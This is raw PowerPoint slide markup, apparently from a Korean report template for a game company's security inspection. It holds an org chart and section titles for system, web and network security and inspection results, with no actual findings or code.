      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3926536" y="1312356"/>
          <a:ext cx="91440" cy="28554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5549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ED9863-E116-46B7-BCC8-EEF9ADA95479}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1783045" y="2277784"/>
          <a:ext cx="203963" cy="15909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0917"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="203963" y="1590917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8D5479-B660-4886-B1E2-A3C16FFB82B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1783045" y="2277784"/>
          <a:ext cx="203963" cy="6254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5488"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="203963" y="625488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A15C3B-6193-478D-AF46-23A4EA4CE2C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2326948" y="1312356"/>
          <a:ext cx="1645307" cy="285549"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1645307" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1645307" y="142774"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="142774"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="285549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BF5A0D-462C-4094-B4F1-20A6BB848BF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="137737" y="2277784"/>
          <a:ext cx="203963" cy="15909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0917"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="203963" y="1590917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565D60-1055-4152-AE97-0A7DD1A08053}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="137737" y="2277784"/>
          <a:ext cx="203963" cy="6254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5488"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="203963" y="625488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A70EDA-B495-4DB2-B729-C242226D3E95}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="681640" y="1312356"/>
          <a:ext cx="3290615" cy="285549"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3290615" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3290615" y="142774"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="142774"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="285549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02D4FD-3181-4F72-8705-B21933AC2935}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3292376" y="632477"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3">
                <a:shade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/>
            <a:t>대표 이사</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3292376" y="632477"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9E667E15-781D-43AE-8BE0-3399CFB9B417}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1761" y="1597905"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect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/>
            <a:t>경영기획부</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1761" y="1597905"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5D10F239-8CD6-4316-9A5D-C8257A071127}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="341701" y="2563334"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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/>
            <a:t>경영기획팀</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="341701" y="2563334"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2A29F0EC-EEDB-4845-88D8-D468E6BBE970}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="341701" y="3528762"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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 err="1"/>
            <a:t>회계팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="341701" y="3528762"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1C79A1E5-021A-407E-B1B5-9973BBF8C849}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1647069" y="1597905"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect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/>
            <a:t>개발관리부</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1647069" y="1597905"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{94925489-038C-4704-998E-6C3A51CB9656}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1987008" y="2563334"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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/>
            <a:t>게임기획팀</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1987008" y="2563334"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{37EE25D6-163F-4666-8890-55DA405755F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1987008" y="3528762"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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/>
            <a:t>게임개발팀</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1987008" y="3528762"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3C94C5FF-7DE2-4010-8807-215AFA78D0C8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3292376" y="1597905"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect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/>
            <a:t>운영관리부</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3292376" y="1597905"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E363457-0EC4-4533-B7EC-AD092046D020}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3632316" y="2563334"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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 err="1"/>
            <a:t>유저관리팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3632316" y="2563334"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C02CFEAA-D648-46AA-B736-C55F9C27382D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3632316" y="3528762"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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 err="1"/>
            <a:t>게임관리팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3632316" y="3528762"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{544BE29F-4111-47C3-9617-7CCB7A0713A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4937684" y="1597905"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect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/>
            <a:t>사업지원부</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4937684" y="1597905"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8243F640-A6AE-45B6-A1CB-941D0E30BE9C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5277624" y="2563334"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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 err="1"/>
            <a:t>마케팅팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5277624" y="2563334"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E9CDBC5E-907E-4FED-80C7-073031FCB394}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5277624" y="3528762"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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 err="1"/>
            <a:t>사업지원팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5277624" y="3528762"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{51986415-892F-4E9A-B737-2C404E1B5318}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6582992" y="1597905"/>
          <a:ext cx="1359758" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect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/>
            <a:t>국제사업부</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6582992" y="1597905"/>
        <a:ext cx="1359758" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E4F64DE7-4DAC-40DA-B02C-BC11BBEC0C84}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6922931" y="2563334"/>
          <a:ext cx="1781446" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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/>
            <a:t>국제사업기획팀</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6922931" y="2563334"/>
        <a:ext cx="1781446" cy="679879"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3A6B6A07-D695-4F3F-900D-AD5D77D4DBD4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6922931" y="3528762"/>
          <a:ext cx="1829051" cy="679879"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent3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 err="1"/>
            <a:t>국제사업운영팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6922931" y="3528762"/>
        <a:ext cx="1829051" cy="6798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0EF05-A812-4F07-8D22-B2E7ACC02F97}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2018-07-03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584200" y="1035051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364C13-A5E2-40BB-92EA-24A112574F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419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65150" y="106045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361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65150" y="106045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039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65150" y="106045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208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1411217"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127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712112" y="1519706"/>
            <a:ext cx="1677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INTRODUCTION</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="2155619"/>
            <a:ext cx="120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BUSINESS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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12112" y="2791532"/>
            <a:ext cx="1050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HISTORY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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12112" y="3427445"/>
            <a:ext cx="1369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REQUESTER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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40" y="1533112"/>
            <a:ext cx="325148" cy="32514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07" y="2180672"/>
            <a:ext cx="325148" cy="32514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78" y="2806906"/>
            <a:ext cx="325148" cy="32514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40" y="3440851"/>
            <a:ext cx="325148" cy="3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91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1411217"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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712112" y="151970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보안점검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712112" y="2155619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시스템보안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12112" y="279153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웹보안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12112" y="342744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네트워크보안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2169025"/>
            <a:ext cx="325148" cy="32514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1510199"/>
            <a:ext cx="325148" cy="32514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3440851"/>
            <a:ext cx="325148" cy="32514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2821855"/>
            <a:ext cx="325148" cy="325148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2499681" y="79459"/>
            <a:ext cx="18517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점검 결과</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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85580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-33999" y="2063340"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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712112" y="151970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보안점검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712112" y="2155619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시스템보안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12112" y="279153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웹보안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12112" y="342744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네트워크보안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2169025"/>
            <a:ext cx="325148" cy="32514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1510199"/>
            <a:ext cx="325148" cy="32514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3440851"/>
            <a:ext cx="325148" cy="32514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2821855"/>
            <a:ext cx="325148" cy="325148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2499681" y="79459"/>
            <a:ext cx="18517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점검 결과</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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6967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2722873"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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712112" y="151970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보안점검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712112" y="2155619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시스템보안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12112" y="279153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웹보안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12112" y="342744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네트워크보안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2169025"/>
            <a:ext cx="325148" cy="32514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1510199"/>
            <a:ext cx="325148" cy="32514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3440851"/>
            <a:ext cx="325148" cy="32514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2821855"/>
            <a:ext cx="325148" cy="325148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2499681" y="79459"/>
            <a:ext cx="18517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점검 결과</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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562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3335166"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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712112" y="151970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보안점검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712112" y="2155619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시스템보안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12112" y="279153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웹보안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12112" y="342744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네트워크보안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2169025"/>
            <a:ext cx="325148" cy="32514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1510199"/>
            <a:ext cx="325148" cy="32514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3440851"/>
            <a:ext cx="325148" cy="32514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2821855"/>
            <a:ext cx="325148" cy="325148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2499681" y="79459"/>
            <a:ext cx="18517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점검 결과</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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26671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9712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65F28D-C39D-47B8-8FC4-2B784F88D3B4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63F792-C80B-4EB2-BB75-225D346B46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2109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65F28D-C39D-47B8-8FC4-2B784F88D3B4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63F792-C80B-4EB2-BB75-225D346B46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470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65F28D-C39D-47B8-8FC4-2B784F88D3B4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63F792-C80B-4EB2-BB75-225D346B46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385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65F28D-C39D-47B8-8FC4-2B784F88D3B4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63F792-C80B-4EB2-BB75-225D346B46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6223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65F28D-C39D-47B8-8FC4-2B784F88D3B4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63F792-C80B-4EB2-BB75-225D346B46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2857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0" y="2020816"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="직사각형 2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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712112" y="2155619"/>
            <a:ext cx="120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BUSINESS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="2791532"/>
            <a:ext cx="1050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HISTORY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="3427445"/>
            <a:ext cx="1369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REQUESTER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="1519706"/>
            <a:ext cx="1677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INTRODUCTION</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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40" y="1533112"/>
            <a:ext cx="325148" cy="325148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07" y="2180672"/>
            <a:ext cx="325148" cy="325148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78" y="2806906"/>
            <a:ext cx="325148" cy="325148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40" y="3440851"/>
            <a:ext cx="325148" cy="3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01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A4C3773-2DA4-4849-9D4D-14793CDB02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37C48CB9-37BE-4EE2-BC5B-DAC74E3F6E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2AE11AF-B7CB-454C-A401-FDC09F0E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DF1B21-3177-473D-9A5D-5080DD36DE8C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E89CD3B-0FB3-4877-B2BA-A5D6EBA23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1C99BE6-7738-46DC-A031-D2BEE09E9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4D43E3-320C-407E-A8BA-F959277E9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562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20940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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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8359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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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0487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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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396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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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0978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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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517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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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0242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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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1022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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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909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2688473"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712112" y="1519706"/>
            <a:ext cx="1677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INTRODUCTION</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="2155619"/>
            <a:ext cx="120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BUSINESS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="2791532"/>
            <a:ext cx="1050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HISTORY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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12112" y="3427445"/>
            <a:ext cx="1369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REQUESTER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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40" y="1533112"/>
            <a:ext cx="325148" cy="32514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07" y="2180672"/>
            <a:ext cx="325148" cy="32514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78" y="2806906"/>
            <a:ext cx="325148" cy="32514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40" y="3440851"/>
            <a:ext cx="325148" cy="3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3258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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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8043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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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8280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59AC-5A6F-46E8-AFC4-5BFAE7C08DF2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311E-49C6-4F39-8892-249C0EB57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5765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0904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0852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4" y="1709745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4" y="4589470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2189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5167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365129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9417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4544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562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 userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="3312587"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="직사각형 8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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="직사각형 9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수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY수평선B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:endParaRPr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712112" y="1519706"/>
            <a:ext cx="1677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INTRODUCTION</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="2155619"/>
            <a:ext cx="120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BUSINESS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="2791532"/>
            <a:ext cx="1050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HISTORY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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712112" y="3427445"/>
            <a:ext cx="1369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REQUESTER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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40" y="1533112"/>
            <a:ext cx="325148" cy="3251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07" y="2180672"/>
            <a:ext cx="325148" cy="32514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78" y="2806906"/>
            <a:ext cx="325148" cy="32514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40" y="3440851"/>
            <a:ext cx="325148" cy="3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500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32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6261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32"/>
            <a:ext cx="6172201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5669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48770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4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4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4343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36212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31053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4" y="1709745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4" y="4589470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62545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77244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365129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9091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807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1411217"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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712112" y="151970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조직도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585488" y="215561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네트워크구성도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97" y="1526409"/>
            <a:ext cx="325148" cy="32514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40" y="2169025"/>
            <a:ext cx="325148" cy="3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318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56338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32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7566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32"/>
            <a:ext cx="6172201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67741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6422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4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4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204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0" y="2020816"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="직사각형 2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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
